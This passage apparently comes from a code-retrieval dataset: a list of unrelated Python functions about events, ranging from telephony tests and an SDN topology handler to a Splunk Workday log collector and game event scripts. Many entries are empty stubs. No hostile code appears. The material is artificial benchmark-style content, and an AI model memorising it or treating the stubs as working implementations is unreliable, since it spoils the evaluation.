\"all\":\n self.capture_events.extend(event_type[\"events\"])\n elif events != \"0\":\n events_from_config = events.split(\",\")\n events_to_capture = list(set(events_from_config) & set(event_type[\"events\"]))\n self.capture_events.extend(events_to_capture)\n\n self.logger.info(\"Configured to capture events: %s\" % self.capture_events)", "def get_events(self):\n raise NotImplementedError", "def get_events(self):\n raise NotImplementedError", "def get_rp_waf_events(isamAppliance, instance, date, duration, type, check_mode=False,\n force=False):\n return isamAppliance.invoke_get(\n \"Retrieving security action events for a Reverse Proxy instance\",\n \"/analysis/reverse_proxy_traffic/pam_events{0}\".format(\n tools.create_query_string(\n date=date,\n duration=duration,\n instance=instance,\n type=type)),requires_model=requires_model)", "def required_event_keys(cls):\n return {'app_type', 'destination_function_name', 'schedule_expression'}", "def address_mapped_event(self, event):\r\n output = [event.event_name, event.from_addr, event.to_addr, \r\n time.asctime(event.when)]\r\n plog(\"DEBUG\", \" \".join(output))", "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def get_events(self):\n #Returne the capture events\n raise NotImplementedError", "def _extract_complement_events(self):\n\t\ttry:\n\t\t\ttable = 
self.hdf5file[fastq_paths[self.version]['complement'] % self.group]\n\t\t\tself.complement_events = [Event(x) for x in table['Events'][()]]\n\t\texcept Exception, e:\n\t\t\tself.complement_events = []", "def forwarder_state_changed(self, ev):\n\n\n dp = ev.dp\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n\n\n if ev.enter is True:\n # in plain MAC setup, this should install only ICMP and ARP re-route rules, watchout for hardcoded DP id\n self.on_inner_dp_join(dp)\n\t ##For evry new forwarder we send out discovery ICMP packets out of every port except OFPP_CONTROLLER\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' saying hello to Unifycore Controller, Unifycore warmly welcomes you!')\n for port in dp.ports:\n if port != (ofp.OFPP_CONTROLLER):\n LOG.debug('TOPO MNGR: Controller is sending topology discovery ICMPs to forwarder: ' + str(dp.id) + ', port: ' + str(port))\n _icmp_send(dp,port,DISCOVERY_IP_SRC, DISCOVERY_IP_DST)\n\n ##For evry new forwarder we send out discovery ARP packets out of every port except OFPP_CONTROLLER to find APN\n for apn in APN_POOL:\n if apn.ip_addr != None:\n LOG.debug('TOPO MNGR: Forwarder: '+str(dp.id)+', port: '+ str(port) + ' is looking for APN: ' + str(apn.name) +' at IP: '+str(apn.ip_addr)+' with ARP search source IP: ' + str(apn.arp_origin_ip))\n _arp_send(dp=dp, port_out=port, arp_code=1, ip_target=apn.ip_addr, ip_sender=apn.arp_origin_ip)\n\n\n\n\n\n if ev.enter is False:\n\t ##TODO: We need to scan if any tunnels were affected, and if so, if any PDP COntexts were affected\n ##JUST REMOVING NODE FROM TOPOLOGY ISNT ENOUGH!\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is leaving topology. It was a pleasure for us!')\n topo.del_forwarder(dp.id)", "def event_pattern(self):\n pass # pragma: no cover", "def respond_to_events(self):\n event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events)\n\n if event_response == []:\n return {}\n return event_response[0]", "def parse_event(self):\n event_id = self.replay.read_string()\n group = self.replay.read_string()\n metadata = self.replay.read_string()\n start_time = self.replay.read_uint32()\n end_time = self.replay.read_uint32()\n size = self.replay.read_uint32()\n\n buffer = self.decrypt_buffer(size)\n\n if group == EventTypes.PLAYER_ELIMINATION.value:\n try:\n self.parse_elimination_event(buffer, start_time)\n except:\n logger.error(\"Couldnt parse event PLAYER_ELIMINATION\")\n\n if metadata == EventTypes.MATCH_STATS.value:\n self.parse_matchstats_event(buffer)\n\n if metadata == EventTypes.TEAM_STATS.value:\n self.parse_teamstats_event(buffer)", "def is_eiffel_event_type(event, event_type):\n return event['meta']['type'] == event_type", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_event_agents_responder(self):\n pass", "def genlocationevents(self):\n # By default, CORE generates EMANE location events when nodes\n # are moved; this can be explicitly disabled in core.conf\n tmp = self.session.get_config_item_bool(\"emane_event_generate\")\n if tmp is None:\n tmp = not self.doeventmonitor()\n return tmp", "def get_event_list(self):\n pass", "def test_queue_attn_xfer(self):\n events = self.run_and_get_events('fixtures/queue/queue_attn_xfer.json')\n\n expected_events = self.events_from_tuples((\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'targets': [CallerId(code=150010002, 
number='+31150010004', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '+31150010004',\n 'callee': CallerId(code=150010002, number='+31150010004', is_public=True),\n }),\n ('on_b_dial', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'targets': [CallerId(code=150010003, number='203', is_public=True)],\n }),\n ('on_up', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n 'to_number': '203',\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n }),\n ('on_warm_transfer', {\n 'new_id': 'e83df36bebbe-1507037917.120',\n 'merged_id': 'e83df36bebbe-1507037906.116',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'callee': CallerId(code=150010003, number='203', is_public=True),\n 'redirector': CallerId(code=150010002, number='202', name=\"Samantha Graham\", is_public=True),\n }),\n ('on_hangup', {\n 'call_id': 'e83df36bebbe-1507037917.120',\n 'caller': CallerId(code=15001, number='+31150010001', is_public=True),\n 'to_number': '203',\n 'reason': 'completed',\n }),\n ))\n\n self.assertEqual(expected_events, events)", "def available_events(self):\n return self.target.read_value(self.available_events_file).splitlines()", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_events_responder(self):\n pass", "def handle_events( events, model, arguments = DEFAULT_ARGUMENTS):\n unhandled_events = {}\n \n # pass 1 all events\n for event_id in events:\n event = events[event_id]\n \n if STANDOFF_EVENT_TO_SBO_MAPPING.get( event.type_lower) is None:\n # event is unknown\n logging.getLogger( \"st2sbml\").warning( \"{0} event {1} unhandled, because unknown\".format( get_path( arguments), event))\n elif event.type_lower == \"pathway\":\n pass # do nothing for pathways (entities have already been added)\n # handle localization (special handling)\n elif event.type_lower in [ \"localization\", \"transport\"]: \n handle_localization( event, model, arguments = arguments);\n # handle regulation events (special handling)\n elif event.type_lower in [\"regulation\", \"positive_regulation\", \"negative_regulation\", \"activation\", \"inactivation\", \"catalysis\"]:\n unhandled_event = handle_regulation( event, model, arguments = arguments);\n if not unhandled_event is None:\n unhandled_events.update( unhandled_event);\n elif event.type_lower in [\"gene_expression\", \"transcription\", \"translation\"]:\n handle_gene_expression( event, model, arguments = arguments);\n # not all roles are entities\n elif not all( [ isinstance( role[1] , parse_standoff.EntityTrigger) for role in event.roles]):\n logging.getLogger( \"st2sbml\").warning( \"{0} event {1} unhandled. 
Some roles are events, which is not allowed for this event type\".format( get_path( arguments), event))\n # everything else: Conversion, Acetylation, Deacetylation, Demethylation, Dephosphorylation, Deubiquitination, Methylation, Phosphorylation, Ubiquitination\n else: \n # add reaction\n reaction = add_reaction( event, model, arguments = arguments);\n \n # handle products -> add as product\n for product in event.get_roles( \"product\"):\n add_product( product.id, reaction, model, arguments = arguments);\n # handle themes -> add as reactants\n for theme in event.get_roles( \"theme\"):\n add_reactant( theme.id, reaction, model, arguments = arguments);\n # handle comp -> add as reactants\n for comp in event.get_roles( \"complex\"):\n add_reactant( comp.id, reaction, model, arguments = arguments);\n # handle Participant -> add as product\n for comp in event.get_roles( \"participant\"):\n add_reactant( comp.id, reaction, model, arguments = arguments);\n # handle causes -> add as modifiers\n for cause in event.get_roles( \"cause\"):\n add_modifier( cause.id, reaction, model, arguments = arguments);\n for site in event.get_roles( \"site\"):\n add_note( \"Site: {0}\".format( site.text), reaction, arguments = arguments);\n\n # check if there are any unhandled roles\n for unhandled_role in set([role[0] for role in event.roles]).difference([\"theme\", \"cause\", \"product\", \"site\", \"participant\", \"complex\"]):\n logging.getLogger( \"st2sbml\").warning( \"{0} event {1} role {2} not handled, because unknown.\".format( get_path( arguments), event, unhandled_role))\n\n\n # pass 2 all unhandled events\n for event_id in unhandled_events:\n event = events[event_id]\n unhandled_roles = unhandled_events[event_id]\n handle_unhandled_event( event, unhandled_roles, model, arguments = arguments);", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_events_responder_spaces(self):\n pass", "def get_events_need_escalation(self, source_type: str) -> List[EventRecord]:\n with self.session.begin() as session:\n events_to_escalate = (\n session.query(EventRecord)\n .filter(\n (EventRecord.sent_at.isnot(None))\n & (EventRecord.escalated_at.is_(None))\n & (EventRecord.source_type == source_type)\n )\n .outerjoin(IgnoreFingerprintRecord, EventRecord.fingerprint == IgnoreFingerprintRecord.fingerprint)\n .filter(IgnoreFingerprintRecord.ignore_type == IgnoreFingerprintRecord.ESCALATE_MANUALLY)\n .all()\n )\n return events_to_escalate", "def determine_emitter(cls, request):\r\n default_emitter = cls._meta.emitters[0]\r\n if not request:\r\n return default_emitter\r\n\r\n if request.method == 'OPTIONS':\r\n return JSONEmitter\r\n\r\n accept = request.META.get('HTTP_ACCEPT', '*/*')\r\n if accept == '*/*':\r\n return default_emitter\r\n\r\n base_format = mimeparse.best_match(cls._meta.emitters_dict.keys(),\r\n accept)\r\n return cls._meta.emitters_dict.get(\r\n base_format,\r\n default_emitter)", "def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_event_agents_responder_spaces(self):\n pass", "def test_otoroshi_controllers_adminapi_analytics_controller_filterable_events(self):\n pass", "def test_load_response_descriptor_events_event_event_resource(self):\n pass", "def _send_events(self, payloads, combined_events=False):\n try:\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n if not combined_events:\n for payload in payloads:\n print payload\n udp_socket.sendto(payload, self.statsd_addr)\n else:\n # send multiple events per packet\n payload = 
self.combine_key.join(payloads)\n udp_socket.sendto(payload, self.statsd_addr)\n except Exception:\n self.logger.exception(\"Error sending statsd event\")", "def get_events(self):\n disallowed = [ident(self.add_event.__func__), ident(ident)]\n self.frames = None\n\n return [item for item in self.events if item[2] not in disallowed]", "def all_events_request():\n result = []\n message = json.loads(request.stream.read().decode('utf-8'))\n for ruleset_name in host.list_rulesets():\n result.append(host.post(ruleset_name, message))\n return jsonify(result)", "def events(self):", "def events_info(request):\n \n global input\n \n if request == 'event-based':\n client_neries = Client_neries()\n \n events = client_neries.getEvents(min_datetime=input['min_date'], \\\n max_datetime=input['max_date'], min_magnitude=input['min_mag'], \\\n max_magnitude=input['max_mag'], min_latitude=input['evlatmin'], \\\n max_latitude=input['evlatmax'], min_longitude=input['evlonmin'], \\\n max_longitude=input['evlonmax'], min_depth = input['min_depth'], \\\n max_depth=input['max_depth'], max_results=input['max_result'])\n \n for i in range(0, len(events)):\n events[i]['t1'] = events[i]['datetime'] - input['preset']\n events[i]['t2'] = events[i]['datetime'] + input['offset']\n \n elif request == 'continuous':\n m_date = UTCDateTime(input['min_date'])\n M_date = UTCDateTime(input['max_date'])\n \n t_cont = M_date - m_date\n \n events = []\n \n if t_cont > input['interval']:\n num_div = int(t_cont/input['interval'])\n t_res = t_cont - num_div*input['interval']\n \n for i in range(0, num_div):\n events.append({'author': 'NAN', 'event_id': 'continuous' + str(i), \\\n 'origin_id': -12345.0, 'longitude': -12345.0, \\\n 'datetime': m_date + i*input['interval'], \\\n 't1': m_date + i*input['interval'],\\\n 't2': m_date + (i+1)*input['interval'] + 60.0,\\\n 'depth': -12345.0, 'magnitude': -12345.0, \\\n 'magnitude_type': 'NAN', 'latitude': -12345.0, \\\n 'flynn_region': 'NAN'})\n \n events.append({'author': 'NAN', 'event_id': 'continuous' + str(i+1), \\\n 'origin_id': -12345.0, 'longitude': -12345.0, \\\n 'datetime': m_date + (i+1)*input['interval'], \\\n 't1': m_date + (i+1)*input['interval'],\\\n 't2': M_date,\\\n 'depth': -12345.0, 'magnitude': -12345.0, \\\n 'magnitude_type': 'NAN', 'latitude': -12345.0, \\\n 'flynn_region': 'NAN'})\n else:\n events.append({'author': 'NAN', 'event_id': 'continuous0', \\\n 'origin_id': -12345.0, 'longitude': -12345.0, \\\n 'datetime': m_date, \\\n 't1': m_date,\\\n 't2': M_date,\\\n 'depth': -12345.0, 'magnitude': -12345.0, \\\n 'magnitude_type': 'NAN', 'latitude': -12345.0, \\\n 'flynn_region': 'NAN'})\n\n return events", "def describe_events(ServerName=None, NextToken=None, MaxResults=None):\n pass", "def get_events(self):\n return self.events", "def collect_events(helper, ew):\n\n '''\n # The following example writes a random number as an event. (Multi Instance Mode)\n # Use this code template by default.\n import random\n data = str(random.randint(0,100))\n event = helper.new_event(source=helper.get_input_type(), index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), data=data)\n ew.write_event(event)\n '''\n\n '''\n # The following example writes a random number as an event for each input config. 
(Single Instance Mode)\n # For advanced users, if you want to create single instance mod input, please use this code template.\n # Also, you need to uncomment use_single_instance_mode() above.\n import random\n input_type = helper.get_input_type()\n for stanza_name in helper.get_input_stanza_names():\n data = str(random.randint(0,100))\n event = helper.new_event(source=input_type, index=helper.get_output_index(stanza_name), sourcetype=helper.get_sourcetype(stanza_name), data=data)\n ew.write_event(event)\n '''\n\n if helper.get_log_level() == \"DEBUG\":\n import traceback\n debug = True\n else:\n debug = False\n\n try:\n # Construct Workday client from the provided global config\n rest_api_endpoint = helper.get_global_setting(\"rest_api_endpoint\")\n token_endpoint = helper.get_global_setting(\"token_endpoint\")\n client_id = helper.get_global_setting(\"client_id\")\n client_secret = helper.get_global_setting(\"client_secret\")\n refresh_token = helper.get_global_setting(\"refresh_token\")\n\n empty_fields = []\n if not rest_api_endpoint:\n empty_fields.append(\"Workday REST API Endpoint\")\n if not token_endpoint:\n empty_fields.append(\"Token Endpoint\")\n if not client_id:\n empty_fields.append(\"Client ID\")\n if not client_secret:\n empty_fields.append(\"Client Secret\")\n if not refresh_token:\n empty_fields.append(\"Refresh Token\")\n if len(empty_fields) > 0:\n raise ValueError(\"Empty fields in global configuration: {}\".format(\", \".join(empty_fields)))\n\n wday = Workday(rest_api_endpoint, token_endpoint, client_id, client_secret, refresh_token, http_user_agent=USER_AGENT, helper=helper)\n except ValueError as e:\n helper.log_error(str(e))\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n sys.exit(1)\n\n stanza_names = helper.get_input_stanza_names()\n if not isinstance(stanza_names, list):\n stanza_names = [stanza_names]\n\n for stanza_name in stanza_names:\n input_type = helper.get_input_type()\n input_name = helper.get_arg(\"input_name\")\n include_target = helper.get_arg(\"include_target\")\n\n index = helper.get_output_index(stanza_name)\n sourcetype = \"workday:{}\".format(input_name)\n\n if input_name == \"user_activity\":\n\n # Pull checkpoint value and setup query range for this run\n # Only pull up to 5 minutes in the past to allow time for events to be available in the report\n checkpoint_format = \"%Y-%m-%dT%H:%M:%SZ\"\n end = datetime.datetime.utcnow() - datetime.timedelta(minutes=5)\n start = helper.get_check_point(input_name)\n if start is None:\n start = end\n helper.log_info(\"No timestamp checkpoint found for input \\\"{}\\\", starting from now ({})\".format(\n input_name,\n start.strftime(checkpoint_format)\n ))\n # Save current time now to preserve original start time in case of errors\n helper.save_check_point(input_name, end.strftime(checkpoint_format))\n\n else:\n # Confirm that the checkpoint is in the correct format\n try:\n start = datetime.datetime.strptime(start, checkpoint_format)\n except ValueError as e:\n helper.log_error(\"Invalid checkpoint value for input \\\"{}\\\", aborting ({})\".format(input_name, str(e)))\n continue\n\n\n helper.log_info(\"Starting input \\\"{}\\\" for window ({}, {})\".format(\n input_name,\n start.strftime(checkpoint_format),\n end.strftime(checkpoint_format)\n ))\n\n try:\n input_start = time.time()\n results = list(wday.audit_logs(start, end, include_target=include_target))\n\n except requests.exceptions.ConnectionError as e:\n helper.log_error(\"Unable to connect to host\")\n if debug: 
helper.log_debug(\"\".join(traceback.format_exc()))\n\n except requests.exceptions.Timeout as e:\n helper.log_error(\"Request timed out, retries exhausted\")\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n except requests.exceptions.HTTPError as e:\n helper.log_error(\"Request failed with error code ({}), retries exhausted\".format(e.response.status_code))\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n except Exception as e:\n helper.log_error(\"Unknown exception occurred ({})\".format(str(e)))\n if debug: helper.log_debug(\"\".join(traceback.format_exc()))\n\n else:\n\n # Deliberately wait to write events until all are collected with no errors\n # otherwise errors or restarts could cause missing / duplicate events\n for result in results:\n event = helper.new_event(\n source = input_type,\n index = index,\n sourcetype = sourcetype,\n data = json.dumps(result)\n )\n ew.write_event(event)\n\n input_runtime = time.time() - input_start\n event_count = len(results)\n helper.log_info(\"Finished input \\\"{}\\\" for window ({}, {}) in {} seconds, {} events written\".format(\n input_name,\n start.strftime(checkpoint_format),\n end.strftime(checkpoint_format),\n round(input_runtime, 2),\n event_count\n ))\n\n helper.save_check_point(input_name, end.strftime(checkpoint_format))\n\n else:\n helper.log_warning(\"Invalid input \\\"{}\\\", supported values are \\\"{}\\\"\".format(input_name, \"|\".join(VALID_INPUTS)))", "def event706():\n header(706, 0)\n\n if_event_flag_on(-1, 710)\n if_event_flag_on(-1, EVENT.WarpAbilityAtSunChamber)\n if_condition_true(0, -1)\n\n flag.enable(706) # Enable warping.\n\n # WARPING IS ACTIVE WHILE PENDING HERE.\n\n if_event_flag_on(-1, 11705170) # Player in Archive Tower ...\n if_in_world_area(-1, 11, 0) # OR player in Painted World ...\n if_in_world_area(7, 15, 1) # OR (Player in Anor Londo AND Dark Anor Londo active AND Jareel not dead)\n if_event_flag_on(7, 11510400)\n if_event_flag_off(7, 11510901)\n if_condition_true(-1, 7)\n if_in_world_area(6, 14, 1) # OR (Player in Lost Izalith AND Jeremiah present)\n if_event_flag_on(-2, EVENT.JeremiahInRuins)\n if_event_flag_on(-2, EVENT.JeremiahInIzalith)\n if_event_flag_on(-2, EVENT.JeremiahImpatient)\n if_event_flag_on(-2, EVENT.JeremiahFleeingIzalith)\n if_condition_true(6, -2)\n if_condition_true(-1, 6)\n if_condition_true(0, -1)\n flag.disable(706)\n\n # WARPING IS NOT ACTIVE WHILE PENDING HERE.\n\n if_event_flag_off(1, 11705170) # Player not in Archive Tower ...\n if_not_in_world_area(1, 11, 0) # AND player not in Painted World ...\n if_not_in_world_area(-7, 15, 1) # AND (player not in AL OR not Dark Anor Londo OR Jareel dead)\n if_event_flag_off(-7, 11510400)\n if_event_flag_on(-7, 11510901)\n if_condition_true(1, -7)\n if_not_in_world_area(-6, 14, 1) # AND (player not in Izalith OR Jeremiah gone)\n if_event_flag_off(2, EVENT.JeremiahInRuins)\n if_event_flag_off(2, EVENT.JeremiahInIzalith)\n if_event_flag_off(2, EVENT.JeremiahImpatient)\n if_event_flag_off(2, EVENT.JeremiahFleeingIzalith)\n if_condition_true(-6, 2)\n if_condition_true(1, -6)\n if_condition_true(0, 1)\n restart()", "def customEvent(self, e):\n data = e.data()\n \n ## HOST INFO\n \n if data.find('host up') == 0:\n self.emit(PYSIGNAL('host_up'), (data.split(' ')[2],))\n\n elif data.find('host down') == 0:\n self.emit(PYSIGNAL('host_down'), (data.split(' ')[2],))\n\n elif data.find('add group') == 0:\n self.emit(PYSIGNAL('add_group'), (int(data.split(' ')[2]),))\n\n elif data.find('remove group') == 0:\n 
self.emit(PYSIGNAL('remove_group'), (int(data.split(' ')[2]),))\n\n elif data.find('group beat') == 0:\n self.emit(PYSIGNAL('group_beat'), (data[11:],))\n \n ## PKAUDIOD\n \n elif data.find('midi') == 0:\n l = data.split(' ')[1:]\n data = [int(l[0]),int(l[1]),int(l[2]),float(l[3])]\n self.emit(PYSIGNAL('midi'), (data,))\n \n elif data.find('sample:starting') == 0:\n l = data.split(' ')\n self.emit(PYSIGNAL('local_sample_starting'), (int(l[1]),))", "def convert_option_to_events(self, option, option_type):\n if option_type == \"action\":\n name = option[0] if isinstance(option, tuple) else option\n if name == \"tax\":\n claimed = \"Duke\"\n elif name == \"steal\":\n claimed = \"Captain\"\n elif name == \"exchange\":\n claimed = \"Ambassador\"\n elif name == \"assassinate\":\n claimed = \"Assassin\"\n else:\n claimed = None\n return [{\"event\": \"action\", \"info\": {\"type\": name, \"as_character\": claimed, \"from_player\": self.id,\n \"target\": None if isinstance(option, str) else option[1]}}]\n elif option_type == \"reaction\":\n return [{\"event\": \"reaction\", \"info\": {\"type\": option[0], \"from\": self.id, \"as_character\": option[1]}}]\n elif option_type == \"card_selection\":\n return [{\"event\": \"card_loss\", \"info\": {\"character\": self.cards[option][\"character\"], \"player\": self.id}}]\n elif option_type == \"exchange\":\n events = []\n alive_cards = [c for c in self.cards if c[\"alive\"]]\n for i in range(len(alive_cards)):\n events.append({\"event\": \"card_swap\",\n \"info\": {\"from\": alive_cards[i][\"character\"],\n \"to\": option[i], \"player\": self.id}})\n return events", "async def events(self) -> Iterable[Event]:", "def get_events_list(self, opts, args):\n\n\t\timport events\n\n\t\tself.setup_listener_gettext()\n\n\t\t# we need to merge, because some events have only\n\t\t# handlers, and others have only callbacks.\n\t\tevents_names = set(events.events_handlers.keys()\n\t\t\t\t\t\t\t+ events.events_callbacks.keys())\n\t\tmax_name_len = max(len(x) for x in events_names)\n\n\t\tif opts.verbose >= verbose.INFO:\n\t\t\tremote_output(_(u'{0} distinct event(s), {1} handler(s) '\n\t\t\t\t\tu'and {2} callback(s)').format(len(events_names),\n\t\t\t\t\tsum(len(x) for x in events.events_handlers.itervalues()),\n\t\t\t\t\tsum(len(x) for x in events.events_callbacks.itervalues())\n\t\t\t\t\t) + u'\\n')\n\t\t\tfor event_name in events_names:\n\t\t\t\thandlers = events.events_handlers.get(event_name, ())\n\t\t\t\tcallbacks = events.events_callbacks.get(event_name, ())\n\n\t\t\t\tremote_output(_(u'Event: {0}\\n\\tHandlers:{1}{2}\\n'\n\t\t\t\t\t\tu'\\tCallbacks:{3}{4}\\n').format(\n\t\t\t\t\tstylize(ST_NAME, event_name),\n\t\t\t\t\tu'\\n\\t\\t' if len(handlers) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, h.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, h.__module__)) for h\n\t\t\t\t\t\t\tin handlers),\n\t\t\t\t\tu'\\n\\t\\t' if len(callbacks) else u'',\n\t\t\t\t\tu'\\n\\t\\t'.join(_(u'{0} in module {1}').format(\n\t\t\t\t\t\tstylize(ST_NAME, c.__name__),\n\t\t\t\t\t\tstylize(ST_COMMENT, c.__module__)) for c\n\t\t\t\t\t\t\tin callbacks),\n\t\t\t\t))\n\t\telse:\n\t\t\tfor event_name in events_names:\n\t\t\t\tremote_output(_(u'{0}: {1} handler(s), {2} callback(s).\\n').format(\n\t\t\t\t\t\t\tstylize(ST_NAME, event_name.rjust(max_name_len)),\n\t\t\t\t\t\t\tlen(events.events_handlers.get(event_name, ())),\n\t\t\t\t\t\t\tlen(events.events_callbacks.get(event_name, ())),\n\t\t\t\t\t\t))", "def wants_event(self, event_name: str, 
args: Dict) -> bool:\n ret = True\n if self.event_filter and event_name not in self.event_filter:\n ret = False\n elif self.active_monitor_filter and 'monitor' in args and args['monitor'].monitor_type == 'active' \\\n and args['monitor'].id not in self.active_monitor_filter:\n ret = False\n return ret", "def either_events(self, Rover, name1, name2):\n func1 = self.event.get(name1)\n func2 = self.event.get(name2)\n return func1(Rover) or func2(Rover)", "def event_type(self) -> int:\n return self.data[\"args\"][\"eventType\"]", "def do(self, dispatcher, monitor):\n events = []\n\n monitor.notify(self.timestamp, DRIVER, DROPOFF,\n self.driver.identifier, self.driver.destination)\n\n self.driver.end_ride()\n\n # Once a driver drops off a rider, this driver submits a new request.\n events.append(DriverRequest(self.timestamp, self.driver))\n\n return events", "def calculate_events(self):\n\n self.events = []\n\n # birth flows\n for label, var_label in self.var_entry_rate_flow:\n self.events.append((None, label, self.vars[var_label]))\n\n # dynamic transmission flows\n for from_label, to_label, var_label in self.var_transfer_rate_flows:\n val = self.compartments[from_label] * self.vars[var_label]\n if val > 0:\n self.events.append((from_label, to_label, val))\n\n # fixed-rate flows\n for from_label, to_label, rate in self.fixed_transfer_rate_flows:\n val = self.compartments[from_label] * rate\n if val > 0:\n self.events.append((from_label, to_label, val))\n\n # background death flows\n self.vars['rate_death'] = 0.\n for label in self.labels:\n val = self.compartments[label] * self.background_death_rate\n if val > 0:\n self.vars['rate_death'] += val\n self.events.append((label, None, val))\n\n # extra infection-related death flows\n self.vars['rate_infection_death'] = 0.\n for label, rate in self.infection_death_rate_flows:\n val = self.compartments[label] * rate\n if val > 0:\n self.vars['rate_infection_death'] += val\n self.events.append((label, None, val))", "def get_hosts_fanout(self, target, listener_type):", "def process_event(self, event):\n options = {\n Actions.Spawned: self.process_spawned_event,\n Actions.Walked: self.process_walked_event,\n Actions.Ate: None,\n Actions.Eaten: self.process_died_event,\n Actions.Mitosed: None,\n Actions.Died: self.process_died_event,\n Actions.Expired: self.process_died_event,\n Actions.NoAction: None,\n }\n if options[event.action] is not None:\n print(event)\n print('-'*32)\n options[event.action](event)", "def json_get_event():\n t0 = time.time()\n try:\n args = request.args\n if args:\n print(f\"got request args: {args}\")\n else:\n args = json.loads(request.data)\n print(f\"got request data: {args}\")\n uuid = args.get(\"uuid\")\n if not uuid:\n print(\"bp.scene.routes.json_get_person_families: Missing uuid\")\n return jsonify(\n {\"records\": [], \"status\": Status.ERROR, \"statusText\": \"Missing uuid\"}\n )\n\n u_context = UserContext(user_session, current_user, request)\n with EventReader(\"read\", u_context) as service:\n # reader = EventReader(readservice, u_context)\n res = service.get_event_data(uuid, args)\n\n status = res.get(\"status\")\n if status != Status.OK:\n flash(f'{_(\"Event not found\")}: {res.get(\"statustext\")}', \"error\")\n if status != Status.OK:\n return jsonify(\n {\n \"event\": None,\n \"members\": [],\n \"statusText\": _(\"No event found\"),\n \"status\": status,\n }\n )\n # Event\n event = res.get(\"event\", None)\n event.type_lang = jinja_filters.translate(event.type, \"evt\").title()\n # Event members\n members = 
res.get(\"members\", [])\n for m in members:\n if m.label == \"Person\":\n m.href = \"/scene/person?uuid=\" + m.uuid\n m.names[0].type_lang = jinja_filters.translate(m.names[0].type, \"nt\")\n elif m.label == \"Family\":\n m.href = \"/scene/family?uuid=\" + m.uuid\n m.role_lang = jinja_filters.translate(m.role, \"role\") if m.role else \"\"\n # Actually there is one place and one pl.uppers\n places = res.get(\"places\", [])\n for pl in places:\n pl.href = \"/scene/location/uuid=\" + pl.uuid\n pl.type_lang = jinja_filters.translate(pl.type, \"lt\").title()\n for up in pl.uppers:\n up.href = \"/scene/location/uuid=\" + up.uuid\n up.type_lang = jinja_filters.translate(up.type, \"lt_in\").title()\n # Event notes\n notes = res.get(\"notes\", [])\n # Medias\n medias = res.get(\"medias\", [])\n for m in medias:\n m.href = \"/scene/media?uuid=\" + m.uuid\n\n res_dict = {\n \"event\": event,\n \"members\": members,\n \"notes\": notes,\n \"places\": places,\n \"medias\": medias,\n \"allow_edit\": u_context.allow_edit,\n \"translations\": {\"myself\": _(\"Self\")},\n }\n response = StkEncoder.jsonify(res_dict)\n # print(response)\n t1 = time.time() - t0\n stk_logger(\n u_context, f\"-> bp.scene.routes.json_get_event n={len(members)} e={t1:.3f}\"\n )\n return response\n\n except Exception as e:\n traceback.print_exc()\n return jsonify(\n {\n \"records\": [],\n \"status\": Status.ERROR,\n \"member\": uuid,\n \"statusText\": f\"Failed {e.__class__.__name__}\",\n }\n )", "def list_events():\n return [\n snow,\n mosquito,\n sun_heat,\n orage,\n overflowing,\n gathering,\n trampling,\n pollution,\n southern_wind,\n northern_wind,\n fog,\n sun\n ]", "def eventList(filterStr=\"\"):\n\tfilterStr = filterStr.upper()\n\tevents = [i for i in dir(cv2) if 'EVENT' in i and filterStr in i]\n\treturn events", "def _handler_unknown_discover(self, *args, **kwargs):\n\n # force to command mode, this instrument has no autosample mode\n next_state = ProtocolState.COMMAND\n result = []\n\n return next_state, (next_state, result)", "def test_make_event_defaults_dr(self):\n msg_helper = MessageHelper()\n event = msg_helper.make_event(\n 'delivery_report', 'abc123', delivery_status='pending')\n expected_event = TransportEvent(\n event_type='delivery_report', user_message_id='abc123',\n delivery_status='pending',\n transport_type=msg_helper.transport_type,\n transport_name=msg_helper.transport_name,\n transport_metadata={}, helper_metadata={},\n # These fields are generated in both messages, so copy them.\n event_id=event['event_id'], timestamp=event['timestamp'])\n self.assertEqual(expected_event, event)", "def get_event_actions_mapping(self):\n return None", "def event_name_choices(self): \n query = \"\"\"\n SELECT DISTINCT event_name\n FROM tubidw.sampled_analytics_thousandth\n WHERE date >= dateadd('day',-2,GETDATE())\n \"\"\"\n df = tdr.query_redshift(query).to_df()\n return ['no event filter'] + pd.Series(df['event_name']).sort_values().tolist()", "def get_events_params(args: Dict[str, Any]) -> Dict[str, Any]:\n params: Dict[str, Any] = {'event_type': 'Ips Event'}\n arg_keys = args.keys()\n\n if 'duration' in arg_keys:\n params['duration'] = args.get('duration', '')\n\n if 'start_time' in arg_keys:\n start_time = args.get('start_time', '')\n date_time = dateparser.parse(start_time)\n if date_time:\n params['start_time'] = str(\n date_time.strftime(API_SUPPORT_DATE_FORMAT)\n )\n else:\n raise ValueError(\n MESSAGES['INVALID_TIME_VALIDATION'].format('start_time')\n )\n\n if 'end_time' in arg_keys:\n end_time = 
